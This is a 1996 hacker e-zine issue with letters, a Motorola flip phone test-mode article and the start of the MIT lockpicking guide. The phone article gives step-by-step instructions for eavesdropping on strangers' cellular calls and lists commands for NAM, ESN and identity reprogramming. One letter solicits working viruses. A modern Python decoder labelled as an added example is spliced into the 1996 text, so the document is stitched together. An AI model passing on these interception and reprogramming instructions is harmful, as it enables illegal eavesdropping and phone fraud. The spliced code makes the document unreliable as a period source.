Hackers Issue 06
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #6, February, 1996
Edited by: Revolution
-------------------
Hackers Forums
-------------------
From the editor . . . . . . . . . . . . . . . . . . . . . . . . Revolution
Letters . . . . . . . . . . . . . . . . . . . . . . . . .Hackers Worldwide
-------------------
Technology
-------------------
Motorola Flip Phone Fun . . . . . . . . . . . . . . . . . . . . . . Treker
MIT Guide to Lockpicking . . . . . . . . . . . . . . . . . . .Ted the Tool
Yet Another Login Spoof . . . . . . . . . . . . . . . . . . Brent Barnhill
--------------------
Politics
--------------------
A Request for Action . . . . . . . . . . . . . . . . . . . . . .Jim Warren
Cyberspace Makes the Difference . . . . . .Voters Telecommunications Watch
The End . . . . . . . . . . . . . . . . . . . . . . . . . . . . Revolution
-----------------------------------------------------------------------------
Copyright 1996 by Mike Scanlon. All articles remain the property of their
authors, and may be reprinted with their permission. This zine may be
reprinted freely as a whole electronically; for hard copy rights mail the
editor. HACKERS is published monthly by Mike Scanlon; to be added to the
subscription list or to submit articles mail mrs3691@hertz.njit.edu
-----------------------------------------------------------------------------
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #6, File #1 of 8
From the Editor
POW! Just like the sound effects of an old Batman rerun, Hackers is
back at you with another issue of gutwrenching telecommunications adventure.
Throw on your night vision goggles and don't forget your polka dotted box,
cover me honey, I'm going in!
The last couple of weeks hoodlums at NJIT have been seen passing the
early semester blues by red boxing to Brazil, and ordering long distance
coverage and 500 number service to the pay phones in the surrounding area.
Some of these hoodlums appear to have obvious behavioral problems.
But I've been steering clear of all that, concentrating on the mag.
This issue has a few tech articles, along with a favorite of mine: although
it is from 1991 it is mostly still valid, the MIT Guide to Lockpicking.
Politically, a lot has been going on in cyberspace to be happy about, but much
more work is still to be done. More information concerning the state of the
legislation involving the internet will be in next month's issue.
For those of you who haven't heard, Defcon will be happening this
July, the 26th through the 28th, in Las Vegas. More info on this can be had
at http://www.defcon.com; there is also a voice bridge set up by the
promoters of the event at (801) 855-3326. I have a VMB set up at that number,
box 2537, if anybody wants to leave me a message, and prefers not to use the
answering machine I have set up for the purpose. But some people are
impressed by those types of things.
Anyway, I am STILL looking for somebody to handle the bug and virus
of the month columns; if anyone finds the time or interest, drop me a line.
I haven't made the 2600 meeting as I promised, but in the future I will try
to make it. Other projects I've been talking about every month but never
gotten around to doing: putting up a decent website, and setting up a
telnetable site. Both of these I promise to look into by summer. :)
Well, I've been spending the better part of my waking hours trying to
think of cool things I could do to increase reader participation in the zine.
I came up with one thing we could do for next issue: a reader's write
contest! For next issue, as this is "Hackers" magazine, in 2 billion words or
less, describe the best hack you have ever heard of, or even better, the best
hack that you have ever pulled off. The winner will receive an adequate
no-prize that I haven't decided upon yet, but all the submissions will be
printed, so hopefully we'll have some comic relief next issue. So write yours
today, and let's see some submissions! Mrs3691@hertz.njit.edu.
..- Revolution
* * * * * * * * * * * * * * * * * * * *
As always, the standard disclaimer applies. All of these articles are
provided for informational purposes only; Mike Scanlon and the respective
authors cannot be held accountable for any illegal acts they are used to
commit.
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #6, File #2 of 8
Letters
From 0200717@ACAD.NWMISSOURI.EDU Wed Jan 17 12:49:37 1996
Date: Thu, 11 Jan 1996 11:58:49 -0600 (CST)
From: RYAN ECCLES <0200717@ACAD.NWMISSOURI.EDU>
To: mrs3691@hertz.njit.edu
Subject: Hackers
Revolution,
Please include the following request in the next edition of Hackers. I
will be writing a cd-rom soon. I would like to write a cd-rom containing
viruses. This cd-rom can be used to load viruses to your computer in order to
test the effectiveness of your current virus scanner. Unfortunately, I don't
have 650MB of viruses. I know that most of you have a few viruses lying
around, and I would like them. I don't have the largest account in the world
either, so snail mail is the preferred method of transport. If you have some
viruses please send email to 0200717@acad.nwmissouri.edu and let me know the
name of the virus (if known) and the size of the virus (if known). If I don't
have the virus or viruses I will email my address to you. Please pkzip the file
and place it on a 3.5 disk or an iomega zip disk. All disks will be returned upon
request. Contributors may receive a copy of the cd for 15 (slightly over the
cost of a blank cd rom; keep in mind it takes a couple hours to write a cd
correctly and it may take time to get 650 MB of viruses from you.) All
info from contributors will be confidential unless otherwise requested. NO
RECORDS WILL BE KEPT! This keeps both you and I out of trouble. REMEMBER THIS
DISK IS ONLY PROVIDED FOR SECURITY PURPOSES. I prefer to have working viruses,
and descriptions of the viruses as well as what they do.
Thanks HACKERS,
HACK ON!
-----------------------------------------------------------------------------
From wyle@max.tiac.net Mon Jan 29 19:59:26 1996
Date: Sat, 27 Jan 1996 12:56:52 -0501 (EST)
From: Wyld Wyle <wyle@max.tiac.net>
To: michael r scanlon cis stnt <mrs3691@hertz.njit.edu>
Subject: Re: Hackers #5
Dear Mike,
I don't know if this is of any help to you but I have a number that will
tell you what telephone number you are calling from, i.e. if you were
calling from a pay phone or a phone in an office and you wanted to know
what that number is you would call; also good for if you want the number
of a line that a computer is using for a data line. Also bear in mind
that I am from Boston and I don't know if it will work anywhere else, but
it is a 1-800 number so it might. It is 1-800-my-ani-is; after you dial
you will hear a beeping noise (the beep will continue, just type in the
code). The code is either 22, or 20, I forget. Well, hope this is of some
help to you.
.-Wyle
P.S E-mail me back and let me know if it worked!
[Wyle emailed me again and told me the code is 220. Although this number
works nationally, there are three digit numbers to call from every region
that will also give you your ANI; find yours out from your local BBS. Here
in Newark, and I think all of 201, the code is 958.]
..- Revolution
-----------------------------------------------------------------------------
From: IN%"hardguy@continuity.it.com.au" 26-JAN-1996 21:55:20.52
To: IN%"scanlonr@delphi.com"
CC:
Subj: Article update
In reference to Aftermath's article on Beigeboxing In Australia
(issue #4, file #4 of 9): the number to call (from anywhere) to
check what number you are calling from is 1114. 1115 also works;
hopefully 111x also produces linesman test tones.
-h
-----------------------------------------------------------------------------
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #6, File #3 of 8
***************************
* Motorola Flip Phone Fun *
* By *
* Treker *
***************************
So you got yourself a new Motorola Flip Phone, and now that you have
talked to someone goin' 100 down the highway you want to have some real
fun.
Well, one way is to use the Test Mode commands; these are used to test
the phone and set some of its features. To use the test mode commands
you must first get into test mode. Now, to do this with your average flip
phone is pretty simple, and here's how:
1.Take off your battery
2.Look at the back side of the phone where the battery used to be and
locate the three notches at the bottom.
3.Two prongs should be sticking out from the side notches.(See Diagram)
The three prongs
(notice the middle does not have a prong sticking out of it)
(also notice that on the battery there is also three contacts
but none of them stick out)
--- --- ---
| | | | | | | |
| / | | | | / |
| | | | | |
--- --- ---
4.The prongs are where the battery contacts connect with the phone.
5.To get into test mode you must create a prong for the middle notch so it
makes contact with the middle contact on the battery.
6.To make the prong you could use tin foil and just stick it into the
middle notch so it makes contact with the battery.
Any conductive piece of metal will make a good prong, just as long as
it makes contact with the battery.
7.Now replace the battery and turn on the phone. If it lights up normally
it did not work, so take off your battery and adjust your prong so it
definitely makes contact with the battery.
But if you see a bunch of numbers flashing on the display, you are in
test mode.
Notice: If the phone doesn't even light up it's probably because the
prong is touching one of the other contacts, so just adjust
your middle prong until it works.
Now that you are in Test Mode it's time for some commands. To use
the commands you must press the # key and you will see:
US '
This means you are ready to enter commands!
I will give you a complete list below of the commands, but I would like
to spend a little time on one in particular, test mode command #11.
This is used to change cell channels, and through this you can monitor
other calls!! Yes, you read me correctly, you can listen to other people
going 100 down the freeway.
To get it working you must first unmute audio or the conversations will
be too faint, so enter test mode command 08 at the prompt and you should
hear some noise in the speaker.
Then to change the channels, enter 11xxxx,
where x equals the channel you want to listen to. In my area most of
the action happens in the 380 area, so I would enter 11380 at the
prompt.
But the best way to find a conversation is just to scan around randomly.
In a big city you should get at least a couple of conversations. A channel
without a conversation just sounds like static, just thought you should
know.
Below is the complete (up-to-date is a better word) list of test mode
commands. Some of them are useful and some of them are useless, but beware:
some of these commands could screw the phone up some good.
----------------------------CUT-HERE----------------------------------
# Enter Test Command Mode
00# no function
01# Restart (Re-enter DC power start-up routine.) On TDMA telephones, this
command has the same effect as pressing the PWR button.
02# Display Current Telephone Status (This is a non-altering version of the
STATUS DISPLAY. On a 14-character display, all the information is shown.
On a 7-character display only the information on the second line of a
14-character display is shown. On a 10-character display, all the
information on the second line of a 14-character display plus the last
three characters of the first line are shown.)
STATUS DISPLAY, ALTERNATES BETWEEN:
AAA BBB    AAA = Channel Number (decimal), BBB = RSSI reading for channel
CDEFGHI    C through I are as follows:
C = SAT frequency (0=5970, 1=6000, 2=6030, 3=no channel lock)
D = Carrier (0=off, 1=on)
E = Signalling tone (0=off, 1=on)
F = Power attenuation level (0 through 7)
G = Channel mode (0=voice channel, 1=control channel)
H = Receive audio mute (0=unmuted, 1=muted)
I = Transmit audio mute (0=unmuted, 1=muted)
Press * to hold display and # to end.
03# Reset Autonomous Timer. This command results in the reset of the
autonomous timer but does not provide any test function on these models.
04# Initializes Telephone to Standard Default Conditions:
Carrier Off, Power Level 0, Receiver Audio Muted, Transmit Audio Muted,
Signalling Tone Off, SAT Off, Resetting of Watch-Dog Timer Enabled,
DTMF and Audio Tones Off, Audio Path Set to Speaker
05# TX Carrier On (Key Transmitter)
06# TX Carrier Off
07# RX Audio Off (Mute Receiver Audio)
08# RX Audio On (Unmute Receiver Audio)
09# TX Audio Off
10# TX Audio On
11(Ch.No.)# Set Transceiver to Channel xxxx (Receive and Transmit in Decimal;
accepts 1, 2, 3, or 4 digits)
see end of file for more info on this command
12x# Set Power Step to x; (0,1-7) 0=Maximum Power (3 Watts) 7=Minimum Power Out
13# Power Off (Shuts off the radio)
14# 10 kHz Signalling Tone On
15# 10 kHz Signalling Tone Off
16# Setup (Transmits a five word RECC message; each of the five words will
be "FF00AA55CC33." Transmitter de-keys at the end of the message.)
17# Voice (Transmits a two word REVC message; each of the two words will be
"FF00AA55CC33." Transmitter de-keys at the end of the message.)
18# C-Scan (Allows for entry of as many as 5 negative SID's for each NAM.)
Newer Motorola phones are equipped with a feature called C-Scan; this is
an option along with the standard A/B system selections. C-Scan allows
the phone to be programmed with up to five inhibited system ID's per NAM.
This is designed to prevent the phone from roaming onto specified non-home
systems and therefore reduce "accidental" roaming fees.
1 C-Scan can only be programmed from test mode; power the phone up with the
relevant test mode contact grounded (see above).
2 Press # to access test mode.
3 Press 18#; the phone will display "0 40000".
4 Enter the first inhibited system ID and press *.
Continue to enter additional system ID's if required. After the 5th entry
the phone will display "N2". Press * to continue and add system ID's for
NAM 2 as required.
5 If an incorrect entry is made (outside the range of 00000-32767) the
display will not advance; press CLR and re-enter. Use a setting of
40000 for any un-needed locations.
6 When the last entry has been made press * to store and press # to exit,
then turn off power.
or
[**Phones without the C-Scan option used this command to SEND NAM.**]
18# SEND NAM. Display shows AA BB where AA=Address and BB=Data. Displays
the contents of the NAM, one address at a time, advanced by pressing the
* key. The test is exited by depressing the # key. The following data is
contained in the NAM:
SIDH, Sec. Code, OPT. (1,2,&3), MIN, MIN1, MIN2, FCHNA, SCM, FCHNB,
IPCH, NDED, ACCOLC, CHKSUM, GIM
19# Display Software Version Number (4 digits displayed as year and week)
NOTE: Entering commands 20# through 23# or 27# causes the transceiver to begin
a counting sequence or continuous transmission as described below. In
order to exit from the commands to enter another test command, the #
key must be depressed; all other key depressions are ignored.
20# Receive control channel messages counting correctable and uncorrectable
errors. When the command starts, the number of the command will be
displayed in the upper-right corner of the display. Entering a # key
will terminate the command and display two three-digit numbers in the
display. The first number is the number of correctable errors and the
second is the uncorrectable errors.
21# Receive voice channel messages counting correctable and uncorrectable
errors. When the command starts, the number of the command will be
displayed in the upper right-hand corner of the display. Entering a #
key terminates the command and will display two three-digit numbers in the
display. The first is the number of correctable errors and the second
is the uncorrectable errors.
22# Receive control channel messages counting word sync sequences. When the
command starts, the number of the command will be displayed in the upper
right-hand corner of the display. Entering a # key will terminate the
command and display the number of word sync sequences in the display.
23# Receive voice channel messages counting word sync sequences. When the
command starts, the number of the command will be displayed in the upper
right-hand corner of the display. Entering a # key will terminate the
command and display the number of word sync sequences in the display.
24# Receive control channel data and display the majority voted busy/idle
bit 0=idle 1=busy
25x# SAT On. When x=0, SAT=5970 Hz
              x=1, SAT=6000 Hz
              x=2, SAT=6030 Hz
26# SAT Off
27# Transmit Data (Transmits continuous control channel data. All words
will be "FF00AA55CC33." When the command starts, '27' will be displayed
in the right side of the display. Entering a # key will terminate the
command. The transmitter de-keys when finished.)
28# Activate the high tone (1150 Hz +/- 55 Hz)
29# De-activate the high tone
30# Activate the low tone (770 Hz +/- 40 Hz)
31# De-activate the low tone
32# Clear (Sets non-volatile memory to zeroes or factory default. This
command will affect all counters, all repertory memory including the last
number called stack, and all user programmable features including the
setting of System Registration. It does not affect the ESN, NAM, phasing
data, or lock code. This takes a minute or so. DO NOT TURN OFF THE
TELEPHONE WHILE THIS IS SHOWING '32' ON THE DISPLAY; WAIT UNTIL THE
NORMAL SERVICE LEVEL DISPLAY RESUMES!)
33x# Turn on DTMF for x (1-9, *, 0, #, plus the single tones)
    Where x= 1  697 Hz + 1209 Hz      10   697 Hz
             2  697 Hz + 1336 Hz      11   770 Hz
             3  697 Hz + 1477 Hz      12   852 Hz
             4  770 Hz + 1209 Hz      13   941 Hz
             5  770 Hz + 1336 Hz      14  1150 Hz (not used in cellular)
             6  770 Hz + 1477 Hz      15  1209 Hz
             7  852 Hz + 1209 Hz      16  1336 Hz
             8  852 Hz + 1336 Hz      17  1477 Hz
             9  852 Hz + 1477 Hz      18  1633 Hz (not used in cellular)
             *  941 Hz + 1209 Hz
             0  941 Hz + 1336 Hz
             #  941 Hz + 1477 Hz
34# Turn DTMF Off
35# Display RSSI ("D" Series Portable Only)
or
35x# Set Audio Path to x x=0, V.S.P Microphone (Applies to mobiles only.)
x=1, Speaker
x=2, Alert
x=3, Handset
x=4, Mute
x=5, External Telephone (Applies to Portables Only)
x=6, External Handset (Applies to NEWER Portables)
36nnn# Scan (TDMA Telephones only. Scans the primary control channels and
attempts to decipher the forward data stream. The display will show PASS1
if the strongest control channel was accessed, PASS2 if the second
strongest was accessed, and FAIL if no control channel could be accessed.)
(nnn=Scan speed in milliseconds). Tunes from channel 1 to 666 in order.
Entering a * pauses the scan and displays current Channel Number and
RSSI reading (AAA=Channel Number and BBB=RSSI Reading). When scan speed
is 300 milliseconds or greater, the current status is displayed during the
scan; when less than 300 milliseconds the status is displayed only during
pause. Entering * during a pause causes the scan to resume. Entering #
aborts the scan and leaves the mobile tuned to the current channel. During
this command only the * and # keys are recognized.
37# Sets Low Battery Threshold. Usage: #37#x# where x is any number
from 1 to 255. If set to 1, the Low Battery indicator will come up
when the phone is powered on. If set to 255, it may never come up.
38# Display ESN (Displays ESN in four steps, two hexadecimal digits at a time
in a four-digit display. The display shows the address, 00 through 03, as
the first two digits, and two digits of the ESN as the last two digits.
Use the 'G' to step through the entire hexadecimal ESN.)
Compander OFF ("D" Series Portables)
or
38# SND-SNM. Display shows AA BB where AA=Address; BB=Data. Sends the SNM
to the display. All 32 bytes of the SNM will be displayed, one byte at
a time. The byte address will be displayed in the upper right-hand
corner and the contents of that address will be displayed in hex.
The * key is used to step through the addresses similar to the SEND-NAM
(18#) command.
39# Compander ON ("D" Series Portables)
or
39# RCVSU Receive one control channel word. When the word is received it
is displayed in hex. This command will be complete when a control channel
word is received or when the # key is entered to abort the command.
40# RCVVC Receive one voice channel word. When the word is received it is
displayed in hex. This command will be complete when a voice channel
word is received or when the # key is entered to abort the command.
41# Enables Diversity (On F19CTA Series only.)
42# Disables Diversity (On F19CTA Series only.)
43# Disable Diversity
USE T/R ANTENNA (On F19CTA Series only.)
USE R ANTENNA (On D.M.T./ Mini TAC)
44# Disable Diversity
USE R ANTENNA (On F19CTA Series only.)
USE T/R ANTENNA (On D.M.T./ Mini TAC)
45# Display Current RSSI (Displayed as a three-digit decimal number)
46# Display Cumulative Call Timer
47x# Set RX Audio level to X
(For F19CTA Series Transceivers)
X=0, Lowest Volume
X=6, Highest Volume
X=7, mute
Normal setting is 4.
(For D.M.T./ Mini TAC Transceivers)
X=0, Lowest Volume
X=7, Highest Volume
Normal setting is 4.
(For TDMA Transceivers and F09F Series and Higher Portables)
X=0, Lowest Volume
X=15, Highest Volume
Normal setting is 2 to 4 (On TDMA
Transceivers and Micro TAC portables,
settings 8 through 15 are for DTMF
applications only.)
48# Side Tone On. Use this command in conjunction with 350# to test the
entire audio path in hands-free applications.
49# Side Tone Off
50# Maintenance data is transmitted and test results displayed:
PASS=received data is correct
FAIL 1=2 second timeout, no data rec.
FAIL 2=received data is incorrect
51# Test of mobile where maintenance data is transmitted and looped back
Display is as follows:
PASS=looped-back data is correct
FAIL 1=2 second timeout, no looped-back data
FAIL 2=looped-back data is incorrect
52x# SAT Phase Adjustment. A decimal value that corresponds to phase shift
compensation in 4.5 degree increments. Compensation is added to the inherent
phase shift in the transceiver to achieve a total of 0 degrees phase shift.
Do NOT enter any values except those shown below.
0 degrees = 0 121.5 degrees = 59 243.0 degrees = 86
4.5 = 1 126.0 = 60 247.5 = 87
9.0 = 2 130.5 = 61 252.0 = 112
13.5 = 3 135.0 = 62 256.5 = 113
18.0 = 4 139.5 = 63 261.0 = 114
22.5 = 5 144.0 = 40 265.5 = 115
27.0 = 6 148.5 = 41 270.0 = 116
31.5 = 7 153.0 = 42 274.5 = 117
36.0 = 16 157.5 = 43 279.0 = 118
40.5 = 17 162.0 = 44 283.5 = 119
45.0 = 18 166.5 = 45 288.0 = 120
49.5 = 19 171.0 = 46 292.5 = 121
54.0 = 20 175.5 = 47 297.0 = 122
58.5 = 21 180.0 = 64 301.5 = 123
63.0 = 22 184.5 = 65 306.0 = 124
67.5 = 23 189.0 = 66 310.5 = 125
72.0 = 48 193.5 = 67 315.0 = 126
76.5 = 49 198.0 = 68 319.5 = 127
81.0 = 50 202.5 = 69 324.0 = 104
85.5 = 51 207.0 = 70 328.5 = 105
90.0 = 52 211.5 = 71 333.0 = 106
94.5 = 53 216.0 = 80 337.5 = 107
99.0 = 54 220.5 = 81 342.0 = 108
103.5 = 55 225.0 = 82 346.5 = 109
108.0 = 56 229.5 = 83 351.0 = 110
112.5 = 57 234.0 = 84 355.5 = 111
117.0 = 58 238.5 = 85 360.0 = 70
53# Enable scrambler option, when equipped.
54# Disable scrambler option, when equipped.
55# Display/Program N.A.M. (Test Mode Programming)
TEST MODE PROGRAMMING:
Assuming you have completed one of the above steps correctly the phone
will wake up in test mode when you turn the power on. When you first
access test mode the phone's display will alternate between various status
information that includes the received signal strength and channel number.
The phone will operate normally in this mode. You can now access Service
Mode by pressing the # key; the display will clear and a ' will appear.
Use the following procedure to program the phone:
1 Enter 55# to access programming mode.
2 The * key advances to the next step (NOTE that test mode programming
does NOT have step numbers; each time you press the * key the phone
will display the next data entry).
3 The CLR key will revert the display to the previously stored data.
4 The # key aborts programming at any time.
5 To complete programming you must scroll through ALL entries until a '
appears in the display.
6 Note that some entries contain more digits than can be displayed by the
phone, in this case only the last part of the data can be seen.
TEST MODE PROGRAMMING DATA:
STEP#  #OF DIGITS/RANGE  DESCRIPTION
01     00000 - 32767     SYSTEM ID
02     8 DIGIT BINARY    OPTION PROGRAMMING, SEE NOTE 1 BELOW
03     10 DIGITS         MIN (AREA CODE & TEL#)
04     2 DIGITS          STATION CLASS MARK
05     2 DIGITS          ACCESS OVERLOAD CLASS
06     2 DIGITS          GROUP ID (10 IN USA)
07     6 DIGITS          SECURITY CODE
08     3 DIGITS          LOCK CODE
09     3 DIGITS          SERVICE LEVEL (LEAVE AT 004)
10     8 DIGIT BINARY    OPTION PROGRAMMING, SEE NOTE 2 BELOW
11     8 DIGIT BINARY    OPTION PROGRAMMING, SEE NOTE 3 BELOW
12     0333 OR 0334      INITIAL PAGING CHANNEL
13     0333              "A" SYSTEM IPCH
14     0334              "B" SYSTEM IPCH
15     3 DIGIT NUMBER    PAGING CHANNEL (021 IN USA)
16     8 DIGIT BINARY    OPTION PROGRAMMING, SEE NOTE 4 BELOW
Steps 01 through 06 and 12 will repeat for NAM 2 if the second phone
number bit has been enabled in step 11.
NOTES:
Take care with Motorola's use of "0" and "1". Some options use "0" to
enable, some use "1".
These are eight digit binary fields used to select the following options:
1 (step 02 above, suggested entry is: 11101001 for "A" system, 10101001
for "B" sys)
Digit 1: Local use mark, 0 or 1.
Digit 2: Preferred system, 0 or 1.
Digit 3: End to end (DTMF) dialing, 1 to enable.
Digit 4: Not used, enter 0.
Digit 5: Repertory (speed) dialing, 1 to enable.
Digit 6: Auxiliary (horn) alert, 1 to enable.
Digit 7: Hands free (VSP) auto mute, 1 to enable (mutes outgoing hands
free audio until the MUTE key is pressed).
Digit 8: Min mark, 0 or 1.
2 (step 10 above, suggested entry is: 00000100)
Digits 1 - 4: Not used in USA, enter 0.
Digit 5: Single system scan, 1 to enable (scan A or B system only,
determined by bit 2 of step 02. Set to "0" to allow user the
option).
Digit 6: Super speed dial, 1 to enable (pressing N, or NN SND will
dial the number stored in memory location NN).
Digit 7: User selectable service level, 0 to enable (allows user to
set long distance/memory access dialing restrictions).
Digit 8: Lock function, 0 to enable (allows user to lock/un-lock the
phone, if this is set to 1 the phone can not be locked).
3 (step 11 above, suggested entry is: 00000000)
Digit 1: Handset programming, 0 to enable (allows access to programming
mode without having to enter test mode).
Digit 2: Second phone number (not all phones), 1 to enable.
Digit 3: Call timer access, 0 to enable.
Digit 4: Auto system busy redial, 0 to enable.
Digit 5: Speaker disable, 1 to enable (use with select VSP units only,
do not use with 2000 series mobiles).
Digit 6: IMTS/Cellular, 1 to enable (rarely used).
Digit 7: User selectable system registration, 0 to enable.
Digit 8: Dual antennae (diversity), 1 to enable.
4 (step 16 above, suggested entry is: 0011010 for portable and 0011011
for mobile units)
Digit 1: Not used, 0 only.
Digit 2: Not used, 0 only.
Digit 3: Continuous DTMF, 1 to enable (software version 8735 and later).
Digit 4: 8 hour time-out, 0 to enable (software version 8735 and later).
Digit 5: Not used, 0 only.
Digit 6: Failed page indicator, 0 to enable (phone beeps when an
incoming call is detected but signal conditions prevent
completion of the call).
Digit 7: Portable scan, 0 for portable, 1 for mobile units.
56# no function
57x# Call Processing Mode
x=0, AMPS
x=1, NAMPS
x=2-4, RESERVED
x=5, TDMA signalling
x=6, TDMA signalling with loopback before decoding
x=7, TDMA signalling with loopback voice after decoding
x=8, TDMA signalling with loopback FACCH after decoding
x=9, TDMA forced synchronization
58# Compander On (Audio compressor and expander) (See 39#)
59# Compander Off (Audio compressor and expander) (See 38#)
60# no function
61# ESN Transfer (For Series I D.M.T./Mini TAC only)
62# Turn On Ringer Audio Path
63# Turn Off Ringer Audio Path
64#-65# no function
66# Identity Transfer (Series II Tranceivers and some Current Shipping Portables)
67# no function
68# Display FLEX and Model Information
69# Used with Identity Transfer
70# Abbreviated field transmitter audio deviation command, for transceivers
with FCC ID ABZ89FT5668.
71# Abbreviated field power adjustment command, for transceivers with FCC ID
ABZ89FT5668.
72# Field audio phasing commands.
73# Field power adjustment command.
74#-99# no function
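The eight-digit option fields in the 55# programming notes are where the mixed "0 to enable / 1 to enable" polarity bites, so here is a small decoder for them. It is an added example, not code from Treker's article or from Motorola; the option names and polarities are transcribed from notes 1 to 4 above, and step 16 is kept at the seven digit positions the page actually lists.

```python
"""Decode and sanity-check the binary option fields of Motorola test mode
programming (55#): steps 02, 10, 11 and 16.

Added example: the field tables below are transcribed from notes 1-4 of the
article; nothing here comes from Motorola's own tools."""
from __future__ import annotations

from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Option:
    name: str
    on_value: Optional[str]   # digit that enables the option: "1", "0", or None


RAW = None  # digit is a plain 0/1 mark (or an unused position), reported as-is

OPTION_FIELDS = {
    # Note 1, step 02 (suggested 11101001 for "A" system, 10101001 for "B")
    "02": [
        Option("Local use mark", RAW),
        Option("Preferred system", RAW),
        Option("End to end (DTMF) dialing", "1"),
        Option("Not used", RAW),
        Option("Repertory (speed) dialing", "1"),
        Option("Auxiliary (horn) alert", "1"),
        Option("Hands free (VSP) auto mute", "1"),
        Option("Min mark", RAW),
    ],
    # Note 2, step 10 (suggested 00000100); digits 1-4 not used in USA
    "10": [Option("Not used", RAW)] * 4 + [
        Option("Single system scan", "1"),
        Option("Super speed dial", "1"),
        Option("User selectable service level", "0"),
        Option("Lock function", "0"),
    ],
    # Note 3, step 11 (suggested 00000000)
    "11": [
        Option("Handset programming", "0"),
        Option("Second phone number", "1"),
        Option("Call timer access", "0"),
        Option("Auto system busy redial", "0"),
        Option("Speaker disable", "1"),
        Option("IMTS/Cellular", "1"),
        Option("User selectable system registration", "0"),
        Option("Dual antennae (diversity)", "1"),
    ],
    # Note 4, step 16: the article lists seven digit positions and a
    # seven-digit suggested entry (0011010 / 0011011), although the data
    # table calls the field 8 digits, so seven is what is accepted here.
    "16": [
        Option("Not used", RAW),
        Option("Not used", RAW),
        Option("Continuous DTMF", "1"),
        Option("8 hour time-out", "0"),
        Option("Not used", RAW),
        Option("Failed page indicator", "0"),
        Option("Portable scan (0=portable, 1=mobile)", RAW),
    ],
}


def check_option_entry(step: str, digits: str) -> Optional[str]:
    """Return a problem description, or None if the entry is acceptable.
    Mirrors what the phone enforces (binary digits, fixed length) plus the
    notes' rule that 'Not used' positions are entered as 0."""
    fields = OPTION_FIELDS.get(step)
    if fields is None:
        return f"step {step} is not a binary option field"
    if len(digits) != len(fields):
        return f"step {step} takes {len(fields)} digits, got {len(digits)}"
    if set(digits) - {"0", "1"}:
        return "option fields are binary: only 0 and 1 are allowed"
    bad = [i for i, (opt, d) in enumerate(zip(fields, digits), start=1)
           if opt.name == "Not used" and d != "0"]
    if bad:
        return f"'Not used' digit position(s) {bad} must be 0"
    return None


def decode_option_field(step: str, digits: str) -> List[Tuple[str, str]]:
    """(option name, state) per digit; state is "on"/"off" once the
    per-option polarity is applied, or the raw digit for mark bits."""
    problem = check_option_entry(step, digits)
    if problem:
        raise ValueError(problem)
    decoded = []
    for opt, digit in zip(OPTION_FIELDS[step], digits):
        if opt.on_value is None:
            decoded.append((opt.name, digit))
        else:
            decoded.append((opt.name, "on" if digit == opt.on_value else "off"))
    return decoded


def enabled_options(step: str, digits: str) -> List[str]:
    """Names of the options an entry really turns on, polarity applied."""
    return [name for name, state in decode_option_field(step, digits) if state == "on"]


if __name__ == "__main__":
    # Suggested entries from the notes; constructed call, not a phone dump.
    for step, entry in [("02", "11101001"), ("10", "00000100"),
                        ("11", "00000000"), ("16", "0011010")]:
        print(step, entry, enabled_options(step, entry))
```

Note that the suggested step 11 entry of all zeros turns four options on, not none, which is exactly the polarity trap the notes warn about.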
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #6, File #4 of 8
MIT Guide to Lockpicking
Ted the Tool
As I promised, here is the edited text of the MIT GUIDE TO LOCKSMITHING.
It's in the next 10 messages. Enjoy! The file's available for download
from my BBS as MITGUIDE.ZIP. Can be F'Reqed. The editing corrected the
colossal number of spelling and grammatical errors I found.
Regards,
Poor Richard
richard.bash@f68.n105.z1.fidonet.org     Combat Arms BBS
Also: dickbash@rigel.cs.pdx.edu          P.O Box 913
Fido 1:105/68                            Portland, OR 97201
Voice: 1-503-223-3160   BBS: 1-503-221-1777   Shop: 1-503-640-3209
Combat Arms BBS
P.O. Box 913
Portland, Oregon 97207-0913
Voice: (503) 223-3160
BBS: (503) 221-1777
Fido 1:105/68
November 10, 1993
MIT Guide to Lockpicking
by
Ted the Tool
February 14, 1992
Distribution
Copyright 1987, 1991 Theodore T. Tool. All rights reserved.
Permission to reproduce this document on a non-profit basis
is granted provided that this copyright and distribution notice
is included in full. The information in this booklet is provided
for educational purposes only.
August 1991 revision.
Contents
1 It's Easy
2 How a Key Opens a Lock
3 The Flatland Model
4 Basic Picking & The Binding Defect
5 The Pin Column Model
6 Basic Scrubbing
7 Advanced Lockpicking
7.1 Mechanical Skills
7.2 Zen and the Art of Lockpicking
7.3 Analytic Thinking
8 Exercises
8.1 Exercise 1: Bouncing the pick
8.2 Exercise 2: Picking Pressure
8.3 Exercise 3: Picking Torque
8.4 Exercise 4: Identifying Set Pins
8.5 Exercise 5: Projections
9 Recognizing and Exploiting Personality Traits
9.1 Which Way To Turn
9.2 How Far to Turn
9.3 Gravity
9.4 Pins Not Setting
9.5 Elastic Deformation
9.6 Loose Plug
9.7 Pin Diameter
9.8 Beveled Holes and Rounded pins
9.9 Mushroom Driver Pins
9.10 Which Way To Turn
9.11 Which Way To Turn
9.12 Which Way To Turn
9.13 Disk Tumblers
10 Final Remarks
A Tools
A.1 Pick Shapes
A.2 Street cleaner bristles
A.3 Bicycle spokes
A.4 Brick Strap
B Legal Issues
INTRODUCTION
Hello,
My pseudonym is Ted The Tool. I wrote the "MIT Guide To
Lockpicking." Over the years I have followed this list and seen
many requests for the Guide in electronic form. For various
reasons I did not want to post it.
Over the summer I changed my mind, and decided to post it
as a postscript file. A postscript file would allow many people
to print it, while still allowing me some artistic control over
derivative works. I had planned to make several improvements
before posting it, but that seems moot now.
So, I will be posting the original postscript file as a
series of six e-mail messages. Each message is about 62,000 bytes
long so they will pass through most mail forwarders. The
messages form a uuencoded, compressed, postscript file. To
reconstruct the guide, 1) remove the mail headers from the
messages, 2) concatenate them together (Unix cat command) to
make a file called MITLockGuide.ps.Z.uu, 3) run the uudecode
command on the resulting file to create the file
MITLockGuide.ps.Z, and 4) run uncompress on that file to create
MITLockGuide.ps, which you can send to a printer with the lpr
command. The result will be a file called MITLockGuide.ps with a
length of 818540 bytes and sum of "32380 800."
I would like to find some repositories for the Guide. If
you have an FTP site, and are willing to keep a copy of the
guide, please do so, and send me a message telling me its
location, so I can tell other people who want a copy of it. I do
not want to get into the business of mailing out individual
copies via e-mail. I would like to make it easy for other people
to find via archie, gopher, etc. If you are keeping a copy,
